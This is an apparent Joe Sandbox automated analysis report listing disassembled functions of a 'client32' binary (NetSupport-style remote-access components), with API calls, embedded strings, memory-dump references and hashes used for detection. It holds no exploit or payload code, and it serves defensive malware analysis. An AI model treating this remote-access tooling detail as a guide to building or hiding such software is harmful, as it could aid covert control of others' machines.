                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                • API String ID: 2036220054-60805735
                                                                                                • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                                • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                                                • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                                • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                                                Function 1115F240 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                                                • GetLastError.KERNEL32 ref: 1115F275
                                                                                                • wsprintfA.USER32 ref: 1115F288
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                                                • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                • API String ID: 1734919802-1728070458
                                                                                                • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                                • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                                Function 11061320 Relevance: 16.0, APIs: 5, Strings: 4, Instructions: 289registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegQueryInfoKeyA.ADVAPI32 ref: 110613A4
                                                                                                • _malloc.LIBCMT ref: 110613EB
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • RegEnumValueA.ADVAPI32 ref: 1106142B
                                                                                                • RegEnumValueA.ADVAPI32 ref: 11061492
                                                                                                • _free.LIBCMT ref: 110614A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                                • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                • API String ID: 999355418-161875503
                                                                                                • Opcode ID: 166b3f58753b9b284e9903ea1dd98eabc97668d01583a646d31f3d302c663443
                                                                                                • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                                • Opcode Fuzzy Hash: 166b3f58753b9b284e9903ea1dd98eabc97668d01583a646d31f3d302c663443
                                                                                                • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                                Function 1115C8E0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 183commemoryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 1115C927
                                                                                                • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                                • wsprintfW.USER32 ref: 1115C967
                                                                                                • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                                • wsprintfW.USER32 ref: 1115CA27
                                                                                                • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                • API String ID: 3050498177-823534439
                                                                                                • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                                • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                                Function 69D00D40 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 53libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 69D00D48
                                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,00001001,?,00000004,?,00000000,00000000), ref: 69D00D5B
                                                                                                • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-69D2CB4C,?,00001001,?,00000004,?,00000000,00000000), ref: 69D00D76
                                                                                                • _malloc.LIBCMT ref: 69D00D8C
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,00001001,?,00000004,?,00000000), ref: 69D00D9F
                                                                                                • _free.LIBCMT ref: 69D00D84
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69D00DAF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                • API String ID: 1360380336-1843585929
                                                                                                • Opcode ID: b77510b79ad98f1f6f1f1a88f16afe645822b518228ff5d832ceab0572ec3d19
                                                                                                • Instruction ID: d3cc7657b96c787521637dd3dac41d1192f87719e061f00f3406e2518cb32729
                                                                                                • Opcode Fuzzy Hash: b77510b79ad98f1f6f1f1a88f16afe645822b518228ff5d832ceab0572ec3d19
                                                                                                • Instruction Fuzzy Hash: 08017CB5200301ABE6208F60DDA5F5777A8AB41A58F10883CFA669BA80EA71F444C774
                                                                                                Function 11017A40 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,986DAFD2,11030346,00000000), ref: 11017A6E
                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                                • GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                                • QueueUserWorkItem.KERNEL32(110179E0,00000000,00000010), ref: 11017AD7
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11017ADD
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressCreateErrorEventFreeItemLastLoadProcQueueUserWork
                                                                                                • String ID: Kernel32.dll$QueueUserWorkItem
                                                                                                • API String ID: 3361249393-4150702566
                                                                                                • Opcode ID: 3e91b062b7345433f88135f4591795957f231578769475b4b7857bd3e6af7e82
                                                                                                • Instruction ID: 8896b3f3378cccc65e9bab94f377e18e2855128faf3beda00f5a87bac3949b10
                                                                                                • Opcode Fuzzy Hash: 3e91b062b7345433f88135f4591795957f231578769475b4b7857bd3e6af7e82
                                                                                                • Instruction Fuzzy Hash: 0121D3B1D52638ABDB10CFDAD984ADEFFB8EB49B10F10451BF421E7644C7B445008B91
                                                                                                Function 11010140 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                                • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                • String ID: bad cast
                                                                                                • API String ID: 2427920155-3145022300
                                                                                                • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                                • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                                Function 111457A0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 146COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                                                                • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                                • API String ID: 3494822531-1878648853
                                                                                                • Opcode ID: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                                • Instruction ID: 9d2f35c0ca678663173c9787aa50c950699104b7f99c1a06bf1b906e54d037ce
                                                                                                • Opcode Fuzzy Hash: 1e9a8547f1a4d8db54bad5cbccf33acd14b41b9136434f7006fca57feb396e97
                                                                                                • Instruction Fuzzy Hash: F3515E76D0422E9BEB15CF24DC50BDDF7B4AF15708F6001A4DC897B681EB716A88CB91
                                                                                                Function 69CF2F80 Relevance: 10.6, APIs: 7, Instructions: 115COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _calloc.LIBCMT ref: 69CF2FBB
                                                                                                • GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,962D34B3,00000000), ref: 69CF300D
                                                                                                • InterlockedExchange.KERNEL32(-00039761,00000000,?,?,?,?,?,?,?,?,962D34B3,00000000), ref: 69CF301B
                                                                                                • _calloc.LIBCMT ref: 69CF303B
                                                                                                • _memmove.LIBCMT ref: 69CF3049
                                                                                                • InterlockedDecrement.KERNEL32(-000397B9,?,?,?,?,?,?,?,?,?,?,?,?,?,?,962D34B3), ref: 69CF307F
                                                                                                • SetEvent.KERNEL32(0000017C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,962D34B3), ref: 69CF308C
                                                                                                  • Part of subcall function 69CF28D0: wsprintfA.USER32 ref: 69CF2965
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 3178096747-0
                                                                                                • Opcode ID: cc229f2baad0a9995c5465ff87dadd193f183d0d95f5e1383e3a56ee4e274ef1
                                                                                                • Instruction ID: 3ff67e30b99e639339dd18ccdcba14779d83dd0b3bbf0ebdb30c4e91a617f5a5
                                                                                                • Opcode Fuzzy Hash: cc229f2baad0a9995c5465ff87dadd193f183d0d95f5e1383e3a56ee4e274ef1
                                                                                                • Instruction Fuzzy Hash: 214141B6D00209AFDB40CFA9D944AEEB7B8BF4C344F40C52AE519E7240F771A645CBA1
                                                                                                Function 1102A6D0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 101COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • IsJPIK.PCICHEK(986DAFD2,NSM.LIC,?,1102F092,View,Client,Bridge), ref: 1102A6F6
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free_malloc_memsetwsprintf
                                                                                                • String ID: IKS$NSM.LIC$Serial_no$_License$iks.lic
                                                                                                • API String ID: 2814900446-469156069
                                                                                                • Opcode ID: 0379ce3942a913bb4027790b25de064647e56b8370c3ae96010eb9a0c27bd6db
                                                                                                • Instruction ID: 268b58c6f7511c145cb41d8ae554306eba274149ba0ed4ca5467e6687dcac3b5
                                                                                                • Opcode Fuzzy Hash: 0379ce3942a913bb4027790b25de064647e56b8370c3ae96010eb9a0c27bd6db
